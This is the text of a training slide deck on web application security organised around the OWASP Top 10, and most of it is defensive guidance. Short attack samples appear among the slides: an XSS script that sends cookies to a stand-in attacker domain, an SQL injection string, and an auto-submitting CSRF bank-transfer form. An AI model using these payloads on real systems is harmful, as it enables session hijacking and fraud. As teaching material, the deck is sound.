Application Security around OWASP Top 10

1

Many thanks (content & inspiration) to:

Jim Manico, Eoin Keary & Troy Hunt

WARNING

This is an awareness document.

There are more than 10 issues.

You cannot secure an application based on a top ten list.

OWASP Top 10 - 2013

';[1][1]

$NEW_EMAIL = Request['new_email'];

update users set email='$NEW_EMAIL' where id=132005;

SQL Injection

1. WHAT IF: $NEW_EMAIL = ';

2. update users set email='$NEW_EMAIL' where id=132005;

3. update users set email=''; --' where id=132005;

SQL Injection

$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”);

$stmt->bindParam(':new_email', $email);$stmt->bindParam(':user_id', $id);

Query Parameterization(PHP PDO)

SqlConnection objConnection = new SqlConnection(_ConnectionString);objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text);SqlDataReader objReader = objCommand.ExecuteReader();

Query Parameterization(.NET)

String newName = request.getParameter("newName");String id = request.getParameter("id");

//SQLPreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQLQuery safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);

Query Parameterization(Java)

# Create Project.create!(:name => 'owasp') # Read Project.all(:conditions => "name = ?", name) Project.all(:conditions => { :name => name }) Project.where("name = :name", :name => name) Project.where(:id=> params[:id]).all # Update Project.update_attributes(:name => 'owasp')

Query Parameterization Failure(RoR)

OWASP Top 10 - 2013

Disable Browser Autocomplete<form AUTOCOMPLETE="off"><input AUTOCOMPLETE="off">

Only send passwords over HTTPS POSTDo not display passwords in browserInput type=password

Store password based on needUse a salt (de-duplication)SCRYPT/PBKDF2 (slow, performance hit, easy)HMAC (requires good key storage, tough)

[2][2]Password Defenses

1) Do not limit the type of characters or length* of user password

•) Limiting passwords to protect against injection is doomed to failure

•) Use proper encoder and other defenses described instead

Password Storage

2) Use a Cryptographically strong credential-specific salt

•) Protect ([salt] + [password]);

•) Use a 32 char / 64 char salt (may depend on protection function)

•) Do not depend on hiding / splitting / otherwise obscuring the salt

Password Storage

3) Impose difficult verification on attacker ONLY

•) HMAC-SHA256 ([private key], [salt] + [password])

•) Protect the key as any private key

•) Store key outside the credential store (

•) Improvement over (solely) salted schemes; relies on proper key creation & management

Password Storage

4) Impose difficult verification on both(impacts attacker more than defender)

•) pbkdf2([salt] + [password], c=10,000,000);

•) PBKDF2 when FIPS certification or enterprise support on many platforms required

•) Scrypt when resisting hardware accelerated attacks is more important

Password Storage

Basic MFA Considerations

17

• Where do you send the token?– Email (worst – yet, better than none!)– SMS (ok)–Mobile native app (good)– Dedicated token (great)– Printed Tokens (interesting)

• How do you handle thick clients?– Email services, for example– Dedicated and strong per-app passwords

Basic MFA Considerations

18

• How do you handle unavailable MFA devices?– Printed back-up codes– Fallback mechanism (like email)– Call-in center

• How do you handle mobile apps?–When is MFA not useful in mobile app scenarios?

“Forgot Password” design

Require identity questions Last name, account number, email, DOBEnforce lockout policy

Ask one or more good security questionshttps://www.owasp.org/index.php/Choosing_and_Using_Security_Ques

tions_Cheat_Sheet

Send the user a randomly generated token via out-of-bandemail, SMS or hardware / software token generator

Verify code in same web sessionEnforce lockout policy

Change passwordEnforce password policy

OWASP Top 10 - 2013

21

Video

[3][3]Cross Site Scripting (XSS)

<script >var badURL = ‘https://evileviljim.com/somesite/data=‘ + document.cookie;var img = new Image();img.src = badURL;

</script>

<script>document.body.innerHTML=‘<blink>CYBER IS COOL</blink>’;</script>

Anatomy of an XSS Attack

Impact of XSS

– Session Hijacking– Site Defacement–Network Scanning–Undermining CSRF Defenses– Site Redirection/Phishing– Load of Remotely Hosted Scripts–Data Theft–Keystroke Logging–Attackers using XSS more frequently

XSS Prevention (.NET)

• WebForms/WebForms View Engine <%=Server.HtmlEncode(data)%>

• WebForms v4.0+ <%data%>

• MVC3+ Razor View Engine @data

• Data Binding in Web Forms v4 and below<%#Server.HtmlEncode(Eval(“property”))%>

• Data Binding in v4.5 <%#Item.Property%>

• Better: ASP.Net 3.5 and below use AntiXss library directlyMicrosoft.Security.Application.Encoder.HtmlEncode(message)

XSS Prevention (.NET)

• ASP.Net 4 (WebForms and MVC) <httpRuntime encoderType=“Microsoft.Security.Application.AntiXssEncoder,AntiXssLibrary”/>

• ASP.Net 4.5 (AntiXss included in this version!)<httpRuntime encoderType=”System.WebSecurity.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a”/>

• JSON(MVC) Json.Encode(Model)

• Javascript encoding using AntiXssEncoder.JavaScriptEncode(Model.FirstName)

<

&lt;

• No third party libraries or configuration necessary• This code was designed for high-availability/high-

performance encoding functionality• Simple drop-in encoding functionality• Performance, ESAPI integration• More complete API (uri and uri component encoding,

etc) in some regards• Java 1.5+• Last updated January 30, 2014 (version 1.1.1)

https://www.owasp.org/index.php/OWASP_Java_Encoder_Project

OWASP Java Encoder Project

Web Page built in Java JSP is vulnerable to XSSWeb Page built in Java JSP is vulnerable to XSS

OWASP Java Encoder Project

Problem

Solution

1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />

2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %>" />

3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button>

4) <script type="text/javascript">var msg = "<%= Encode.forJavaScriptBlock(message) %>";alert(msg);</script>

HTML ContextsEncode#forHtmlContent(String) Encode#forHtmlAttribute(String) Encode#forHtmlUnquotedAttribute(String)

XML ContextsEncode#forXml(String) Encode#forXmlContent(String) Encode#forXmlAttribute(String) Encode#forXmlComment(String) Encode#forCDATA(String)

CSS ContextsEncode#forCssString(String)Encode#forCssUrl(String)

JavaScript ContextsEncode#forJavaScript(String) Encode#forJavaScriptAttribute(String)Encode#forJavaScriptBlock(String)Encode#forJavaScriptSource(String)

URI/URL contextsEncode#forUri(String)Encode#forUriComponent(String)

OWASP Java Encoder Project

<script src="/my-server-side-generated-script">

class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) {

response.setContentType("text/javascript; charset=UTF-8");

PrintWriter w = response.getWriter(); w.println("function() {");

w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");

w.println("}"); }

}

<script src="/my-server-side-generated-script">

class MyServerSideGeneratedScript extends HttpServlet { void doGet(blah) {

response.setContentType("text/javascript; charset=UTF-8");

PrintWriter w = response.getWriter(); w.println("function() {");

w.println(" alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");

w.println("}"); }

}

OWASP Java Encoder Project

Other Encoding Libraries

• Ruby on Rails– http://api.rubyonrails.org/classes/ERB/Util.html

• Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP– https://www.owasp.org/index.php/Category:OWASP_Encodin

g_Project

• ESAPI– PHP.NET, Python, Classic ASP, Cold Fusion– https://www.owasp.org/index.php/Category:OWASP_Enterpri

se_Security_API

• .NET AntiXSS Library– http://wpl.codeplex.com/releases/view/80289

• Writte in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS

• Has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules

• Very easy to use

• Allows for simple programmatic POSITIVE policy configuration. No XML config.

• << Caja project (Google) High performance & low memory utilization

OWASP HTML Sanitizer Projecthttps://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project

Web Page is vulnerable to XSS because of untrusted HTMLWeb Page is vulnerable to XSS because of untrusted HTML

PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build();String safeHTML = policy.sanitize(untrustedHTML);

PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build();String safeHTML = policy.sanitize(untrustedHTML);

Solving real world problems(using OWASP HTML Sanitizer)

Problem

Solution

• Pure JavaScript– http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer

• Python– https://pypi.python.org/pypi/bleach

• PHP– http://htmlpurifier.org/– http://www.bioinformatics.org/phplabware/internal_utilities/htm

Lawed/

• .NET– AntiXSS.getSafeHTML/getSafeHTMLFragment– http://htmlagilitypack.codeplex.com/

• Ruby on Rails– http://api.rubyonrails.org/classes/HTML.html

Other HTML Sanitizers

• JavaScript encode and delimit untrusted data as quoted strings

• Avoid use of HTML rendering methods like innerHTML– If you must do this, then sanitize untrusted HTML first

• Avoid code execution contexts– eval(), setTimeout() or event handlers

• When possible, treat untrusted data as display text only• To build dynamic interfaces, usedocument.createElement("…"), element.setAttribute("…","value"), element.appendChild(…)

• Parse JSON with JSON.parse in the browser

DOM-based XSS Defense

SAFE use of JQuery

$(‘#element’).text(UNTRUSTED DATA);

UNSAFE use of JQuery

$(‘#element’).html(UNTRUSTED DATA);

OWASP Top 10 - 2013

39

[4][4]Insecure Direct Object Reference

40

Using fiddler an attacker can change the id and access more information

Insecure Direct Object Reference

41

We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further:

public Customer GetCustomer(Guid indirectId) { var customerId = IndirectReferenceMap.GetDirectReference(indirectId); }

Insecure Direct Object Reference

OWASP Top 10 - 2013

[5][5]Security Misconfiguration

Is it really the developers' work? Or the sysadmins?

If the developers don't know, how will the application security design be complete?

What about configuring in Dev & Testing environments?

• Harden the Operating System– BIOS & grub passwords; secure physical access– Use multiple partitions (not default install); use options like

ro, nosuid,noexec,nodev --make-runbindable ...– Remove all unnecessary packages & drivers (e.g., do you

really need Xorg? All those fonts?)– Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, – SSH password-less login with SSH keygen– Enable ufw / iptables / … and a HIDS >> turn on remote

logging– Oh yeah, regular patches & updates (wait!)– Regular backups!

Hardening the servers (general)

• Run Tomcat under a Security Manager– http://tomcat.apache.org/tomcat-6.0-doc/security-manage

r-howto.html– Modify $CATALINA_BASE/conf/catalina.policy

PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, …

– Configure package access (careful! test & debug!)

$CATALINA_BASE/conf/catalina.properties

– Restart Tomcat

$CATALINA_HOME/bin/catalina.sh start -security (Unix)

%CATALINA_HOME%\bin\catalina start -security (Windows)

Secure Config Tips (Tomcat)

• More tips– http://www.tomcatexpert.com/blog/2011/11/02/best-

practices-securing-apache-tomcat-7– Use Security LifeCycle Listener– Lockdown connector interfaces– Disable shutdown port?– Secure your Web Manager– Configure AccessLogValve and RemoteAddrValve

Secure Config Tips (Tomcat)

• Similar principles as Tomcat– Use the Java Security Manager– Configure policies and access permissions– Use Security Realms– Disable remote access to JMX– Configure TLS (SSL?) carefully

remove old protos, weak crypto, renego, legacy support, etc.– Secure the Management interfaces (disable HTTP mgmt?)– ...

Secure Config Tips (JBOSS)

5 things to remember here :

• Error Handling (Enable Custom Errors)

• Disable TRACE

Securing web.config

• Disable Debugging

• HTTP Only cookies

Securing web.config

• Session State- UseCookies

Securing web.config

• Steps :– Go to “C:\Windows\Microsoft.NET\Framework\v4.0.30319” using command prompt.aspnet_regiis.exe -pe "connectionStrings" “<path of Web.Config>”

• Decrypting the web.config– Go to the same pathaspnet_regiis.exe -pd "connectionStrings" “<path of Web.Config>”

Encrypting web.config

• Before Encrypting

Referenceshttp://www.owasp.orghttp://www.codeproject.com/Tips/795135/Encrypt-ConnectionString-in-Web-Config

• After Encrypting

OWASP Top 10 - 2013

55

[6][6]Sensitive Data Exposure

[8][8]

<img src="https://google.com/logo.png">

<img src="https://google.com/deleteMail/7/confirm=true">

<form method="POST" action="https://mybank.com/transfer"><input type="hidden" name="account" value="23532632"/><input type="hidden" name="amount" value="1000"/>

</form><script>document.forms[0].submit()</script>

Cross Site Request Forgery

57

How many are already “logged in”?Waiting to update your status, accept your credit card or email your friendsWhat if another tab manages to send a request?

What about others with the “remember me” checkbox?No need for tab to be open... just send a request and they'll happily accept!

How many tabs on your browser?

58

59

Using fiddler we get the JSON

60

61

62

To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method:

@using (Html.BeginForm("Manage", "Account")) { @Html.AntiForgeryToken() }

This method adds the hidden form field and also sets the cookie token.

<script> @functions{ public string TokenHeaderValue() { string cookieToken, formToken; AntiForgery.GetTokens(null, out cookieToken, out formToken); return cookieToken + ":" + formToken;

}} $.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON data goes here dataType: "json", headers: { 'RequestVerificationToken': '@TokenHeaderValue()' } }); </script>

Anti-Forgery Tokens

63

void ValidateRequestHeader

(HttpRequestMessage request)

{ string cookieToken = ""; string formToken = ""; IEnumerable<string> tokenHeaders;

if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders))

{ string[] tokens = tokenHeaders.First().Split(':');

if (tokens.Length == 2) { cookieToken = tokens[0].Trim(); formToken = tokens[1].Trim(); }

} AntiForgery.Validate(cookieToken, formToken); }

OWASP Top 10 - 2013

if ((user.isManager() ||

user.isAdministrator() ||

user.isEditor()) &&

(user.id() != 1132)) {

//execute action

}

How do you change the policy of this code?

[7][7] Access Control

• Authorization: The process where a system determineswhether a specific user has access to a resource

• Permission: Represents app behavior only

• Entitlement: What a user is actually allowed to do

• Principle/User: Who/what you are entitling

• Implicit Role: Named permission, user associated– if (user.isRole(“Manager”));

• Explicit Role: Named permission, resource associated– if (user.isAuthorized(“report:view:3324”);

What is Access Control

• Hard-coded role checks in application code

• Lack of centralized access control logic

• Untrusted data driving access control decisions

• Access control that is “open by default”

• Lack of addressing horizontal access control in a standardized way (if at all)

• Access control logic that needs to be manually added to every endpoint in code

• Access Control that is “sticky” per session

• Access Control that requires per-user policy

Access Control DON'Ts

• Vertical Access Control Attacks– A standard user accessing administration

functionality

• Horizontal Access Control Attacks– Same role, but accessing another user's private

data

• Business Logic Access Control Attacks– Abuse of one or more linked activities that

collectively realize a business objective

Attacks on Access Control

• Loss of accountability– Attackers maliciously execute actions as other

users– Attackers maliciously execute higher level

actions

• Disclosure of confidential data– Compromising admin-level accounts often

results in access to user’s confidential data

• Data tampering– Privilege levels do not distinguish users who can

only view data and users permitted to modify data

Impact of poor Access Control

• Apache Shiro is a powerful and easy to use Java security framework

• Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management

• Built on sound interface-driven design and OO principles

• Enables custom behavior

• Sensible and secure defaults for everything

Apache SHIRO

http://shiro.apache.org/

Web Application needs secure access control mechanismWeb Application needs secure access control mechanism

if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely.");} else { log.info("Sorry, lightsaber rings are for schwartz masters only.");}

if ( currentUser.isPermitted( "lightsaber:wield" ) ) { log.info("You may use a lightsaber ring. Use it wisely.");} else { log.info("Sorry, lightsaber rings are for schwartz masters only.");}

Problem

Solution

Solving real world Access Control problems

int winnebagoId = request.getInt("winnebago_id");

if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys.");} else { log.info("Sorry, you aren't allowed to drive this winnebago!");}

int winnebagoId = request.getInt("winnebago_id");

if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) { log.info("You are permitted to 'drive' the 'winnebago’. Here are the keys.");} else { log.info("Sorry, you aren't allowed to drive this winnebago!");}

Solving real world Access Control problems

Web Application needs secure access to a specific objectWeb Application needs secure access to a specific object

Problem

Solution

“GET” exposes sensitive authentication information in the URLIn Web Server and Proxy Server logsIn the http referer header         In Bookmarks/Favorites often emailed to others

“POST” places information in the body of the request and not the URL

Enforce HTTPS POST For Sensitive Data Transport73

HTTP: POST vs GET[E1]

» X-Frame-Options» X-XSS-Protection» X-Content-Type-Options » Content Security Policy» Access-Control-Allow-Origin» HTTPS Strict Transport Security» Cache-Control / Pragma

HTTP Response Headers(security related)

Protects you from most classes of Clickjacking

X-Frame-Options: DENYX-Frame-Options: SAMEORIGINX-Frame-Options: ALLOW FROM

X-Frame-Options

X-XSS-Protection

Use the browser’s built in XSS Auditor

X-XSS-Protection: [0-1](; mode=block)?

X-XSS-Protection: 1; mode=block

Fixes mime sniffing attacks

Only applies to IE

X-Content-Type-Options = ‘nosniff’

X-ContentType-Options

• Anti-XSS W3C standard http://www.w3.org/TR/CSP/

• Move all inline script and style into external files

• Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use

• Define a policy for the site regarding loading of content

• Chrome version 25 and later (50%)• Firefox version 23 and later (30%)• Internet Explorer version 10 and later (10%)

Content Security Policy

Add the following as part of your HTTP Response

Cache-Control: no-store, no-cache, must-revalidateExpires: -1

Disabling the browser cache

[E2][E2]Application Layer Intrusion Detection

• Great detection points to start with– Input validation failure server side when client side

validation exists– Input validation failure server side on non-user editable

parameters(hidden fields, checkboxes, radio buttons or select lists)

– Forced browsing to common attack entry points e.g., /admin/secretlogin.jsp or honeypot URL (a fake path listed in /robots.txt)

Application LayerIntrusion Detection

• Others–Blatant SQLi or XSS injection attacks–Workflow sequence abuse (e.g. multi-part

form in wrong order)–Custom business logic (e.g. basket vs

catalogue price mismatch)

OWASP AppSensor (Java)

• Project and mailing list https://www.owasp.org/index.php/OWASP_AppSensor_Project

• Four-page briefing, Crosstalk, Journal of Defense Software Engineering

• http://www.crosstalkonline.org/storage/issue-archives/2011/201109/201109-Watson.pdf

[E3][E3]Encryption in transit

• Confidentiality, Integrity (in Transit) and Authenticity– Authentication credentials and session identifiers must be encrypted in

transit via HTTPS/SSL– Starting when the login form is rendered until logout is complete

• HTTPS configuration best practices– https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sh

eet

• HSTS (Strict Transport Security)– http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000

• Certificate Pinning– https://www.owasp.org/index.php/Pinning_Cheat_Sheet

Strict-transport-security: max-age=10000000

Do all of your subdomains support SSL?

Strict-transport-security: max-age=10000000; includeSubdomains

Strict Transport Security (HSTS)

protected void Application_BeginRequest(Object sender, EventArgs e){ switch (Request.Url.Scheme) { case "https": Response.AddHeader("Strict-Transport-Security", "max-age=31536000"); break; case "http": var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery; Response.Status = "301 Moved Permanently"; Response.AddHeader("Location", path); break; }} // in global.asax

• What is Pinning– Pinning is a key continuity scheme – Detect when an imposter with a fake but CA validated

certificate attempts to act like the real server• 2 Types of pinning• Carry around a copy of the server’s public key;

– Great if you are distributing a dedicated client-server application since you know the server’s certificate or public key in advance

• Note of the server’s public key on first use (Trust-on-First-Use, Tofu)– Useful when no a priori knowledge exists, such as SSH or a

Browser• https://www.owasp.org/index.php/Pinning_Cheat_Sheet

Certificate Pinning

File Upload Security

• Upload Verification– Filename and Size validation + antivirus

• Upload Storage– Use only trusted filenames + separate domain

• Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml".

• Image Upload Verification – Enforce proper image size limits– Use image rewriting libraries– Set the extension of the stored image to be a valid image extension– Ensure the detected content type of the image is safe

• Generic Upload Verification – Ensure decompressed size of file < maximum size – Ensure that an uploaded archive matches the type expected (zip, rar)– Ensure structured uploads such as an add-on follow proper standard

[E4][E4]

Thank you!